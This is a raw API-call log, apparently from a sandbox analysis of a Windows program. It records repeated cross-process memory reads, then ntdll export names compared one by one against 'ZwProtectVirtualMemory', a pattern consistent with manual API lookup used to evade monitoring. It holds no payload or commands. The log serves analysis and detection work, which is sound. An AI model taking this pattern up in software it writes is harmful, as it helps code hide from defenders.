0x0 [0135.549] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7a000, Buffer=0x7ffb, BufferSize=0xb0a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.549] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7b000, Buffer=0x7ffb, BufferSize=0xb0b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.550] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7c000, Buffer=0x7ffb, BufferSize=0xb0c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.550] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7d000, Buffer=0x7ffb, BufferSize=0xb0d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.550] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7e000, Buffer=0x7ffb, BufferSize=0xb0e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.550] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7f000, Buffer=0x7ffb, BufferSize=0xb0f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.550] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b80000, Buffer=0x7ffb, BufferSize=0xb10000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.551] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b81000, Buffer=0x7ffb, BufferSize=0xb11000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.551] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b82000, Buffer=0x7ffb, BufferSize=0xb12000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.551] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b83000, Buffer=0x7ffb, BufferSize=0xb13000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.551] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b84000, Buffer=0x7ffb, BufferSize=0xb14000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.552] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b85000, Buffer=0x7ffb, BufferSize=0xb15000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.552] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b86000, Buffer=0x7ffb, BufferSize=0xb16000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.552] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b87000, Buffer=0x7ffb, BufferSize=0xb17000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.552] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b88000, Buffer=0x7ffb, BufferSize=0xb18000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.553] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b89000, Buffer=0x7ffb, BufferSize=0xb19000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.553] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8a000, Buffer=0x7ffb, BufferSize=0xb1a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.553] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8b000, Buffer=0x7ffb, BufferSize=0xb1b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.553] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8c000, Buffer=0x7ffb, BufferSize=0xb1c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.554] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8d000, Buffer=0x7ffb, BufferSize=0xb1d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.554] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8e000, Buffer=0x7ffb, BufferSize=0xb1e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.554] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8f000, Buffer=0x7ffb, BufferSize=0xb1f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.554] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b90000, Buffer=0x7ffb, BufferSize=0xb20000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.555] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b91000, Buffer=0x7ffb, BufferSize=0xb21000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.555] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b92000, Buffer=0x7ffb, BufferSize=0xb22000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.555] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b93000, Buffer=0x7ffb, BufferSize=0xb23000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.555] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b94000, Buffer=0x7ffb, BufferSize=0xb24000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.555] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b95000, Buffer=0x7ffb, BufferSize=0xb25000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.556] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b96000, Buffer=0x7ffb, BufferSize=0xb26000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.556] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b97000, Buffer=0x7ffb, BufferSize=0xb27000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.556] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b98000, Buffer=0x7ffb, BufferSize=0xb28000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.556] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b99000, Buffer=0x7ffb, BufferSize=0xb29000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.556] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9a000, Buffer=0x7ffb, BufferSize=0xb2a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.557] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9b000, Buffer=0x7ffb, BufferSize=0xb2b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.557] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9c000, Buffer=0x7ffb, BufferSize=0xb2c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.557] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9d000, Buffer=0x7ffb, BufferSize=0xb2d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.557] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9e000, Buffer=0x7ffb, BufferSize=0xb2e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.557] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9f000, Buffer=0x7ffb, BufferSize=0xb2f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.557] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba0000, Buffer=0x7ffb, BufferSize=0xb30000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.558] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba1000, Buffer=0x7ffb, BufferSize=0xb31000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.558] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba2000, Buffer=0x7ffb, BufferSize=0xb32000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.558] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba3000, Buffer=0x7ffb, BufferSize=0xb33000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.558] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba4000, Buffer=0x7ffb, BufferSize=0xb34000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.559] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba5000, Buffer=0x7ffb, BufferSize=0xb35000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.559] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba6000, Buffer=0x7ffb, BufferSize=0xb36000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.559] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba7000, Buffer=0x7ffb, BufferSize=0xb37000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.559] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba8000, Buffer=0x7ffb, BufferSize=0xb38000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.624] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba9000, Buffer=0x7ffb, BufferSize=0xb39000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.624] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28baa000, Buffer=0x7ffb, BufferSize=0xb3a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.624] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bab000, Buffer=0x7ffb, BufferSize=0xb3b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.624] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bac000, Buffer=0x7ffb, BufferSize=0xb3c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.625] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bad000, Buffer=0x7ffb, BufferSize=0xb3d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.625] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bae000, Buffer=0x7ffb, BufferSize=0xb3e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.625] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28baf000, Buffer=0x7ffb, BufferSize=0xb3f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.625] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb0000, Buffer=0x7ffb, BufferSize=0xb40000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.626] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb1000, Buffer=0x7ffb, BufferSize=0xb41000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.626] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb2000, Buffer=0x7ffb, BufferSize=0xb42000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.626] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb3000, Buffer=0x7ffb, BufferSize=0xb43000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.626] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb4000, Buffer=0x7ffb, BufferSize=0xb44000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.626] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb5000, Buffer=0x7ffb, BufferSize=0xb45000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.626] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb6000, Buffer=0x7ffb, BufferSize=0xb46000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.627] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb7000, Buffer=0x7ffb, BufferSize=0xb47000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.627] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb8000, Buffer=0x7ffb, BufferSize=0xb48000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.627] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb9000, Buffer=0x7ffb, BufferSize=0xb49000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.627] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bba000, Buffer=0x7ffb, BufferSize=0xb4a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.627] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbb000, Buffer=0x7ffb, BufferSize=0xb4b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.627] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbc000, Buffer=0x7ffb, BufferSize=0xb4c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.628] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbd000, Buffer=0x7ffb, BufferSize=0xb4d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.628] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbe000, Buffer=0x7ffb, BufferSize=0xb4e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.628] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbf000, Buffer=0x7ffb, BufferSize=0xb4f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.628] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc0000, Buffer=0x7ffb, BufferSize=0xb50000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.628] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc1000, Buffer=0x7ffb, BufferSize=0xb51000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.628] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc2000, Buffer=0x7ffb, BufferSize=0xb52000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.629] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc3000, Buffer=0x7ffb, BufferSize=0xb53000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.629] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc4000, Buffer=0x7ffb, BufferSize=0xb54000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.629] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc5000, Buffer=0x7ffb, BufferSize=0xb55000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.629] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc6000, Buffer=0x7ffb, BufferSize=0xb56000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.629] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc7000, Buffer=0x7ffb, BufferSize=0xb57000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.630] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc8000, Buffer=0x7ffb, BufferSize=0xb58000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.630] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc9000, Buffer=0x7ffb, BufferSize=0xb59000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.630] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bca000, Buffer=0x7ffb, BufferSize=0xb5a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.630] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcb000, Buffer=0x7ffb, BufferSize=0xb5b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.630] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcc000, Buffer=0x7ffb, BufferSize=0xb5c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.630] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcd000, Buffer=0x7ffb, BufferSize=0xb5d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.631] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bce000, Buffer=0x7ffb, BufferSize=0xb5e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.631] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcf000, Buffer=0x7ffb, BufferSize=0xb5f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.631] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd0000, Buffer=0x7ffb, BufferSize=0xb60000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.631] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd1000, Buffer=0x7ffb, BufferSize=0xb61000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.631] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd2000, Buffer=0x7ffb, BufferSize=0xb62000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.631] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd3000, Buffer=0x7ffb, BufferSize=0xb63000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.631] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd4000, Buffer=0x7ffb, BufferSize=0xb64000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.632] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd5000, Buffer=0x7ffb, BufferSize=0xb65000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.632] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd6000, Buffer=0x7ffb, BufferSize=0xb66000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.632] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd7000, Buffer=0x7ffb, BufferSize=0xb67000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.632] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd8000, Buffer=0x7ffb, BufferSize=0xb68000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.632] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd9000, Buffer=0x7ffb, BufferSize=0xb69000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.632] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bda000, Buffer=0x7ffb, BufferSize=0xb6a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.633] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdb000, Buffer=0x7ffb, BufferSize=0xb6b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.633] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdc000, Buffer=0x7ffb, BufferSize=0xb6c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.633] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdd000, Buffer=0x7ffb, BufferSize=0xb6d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.633] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bde000, Buffer=0x7ffb, BufferSize=0xb6e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.633] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdf000, Buffer=0x7ffb, BufferSize=0xb6f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.633] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be0000, Buffer=0x7ffb, BufferSize=0xb70000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.634] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be1000, Buffer=0x7ffb, BufferSize=0xb71000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.659] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwProtectVirtualMemory") returned -1 [0135.659] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwProtectVirtualMemory") returned -1 [0135.659] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwProtectVirtualMemory") returned -1 [0135.659] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwProtectVirtualMemory") returned -1 [0135.659] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0135.659] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0135.659] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwProtectVirtualMemory") returned -1 [0135.660] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0135.799] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwProtectVirtualMemory") returned -1 [0135.799] lstrcmpA 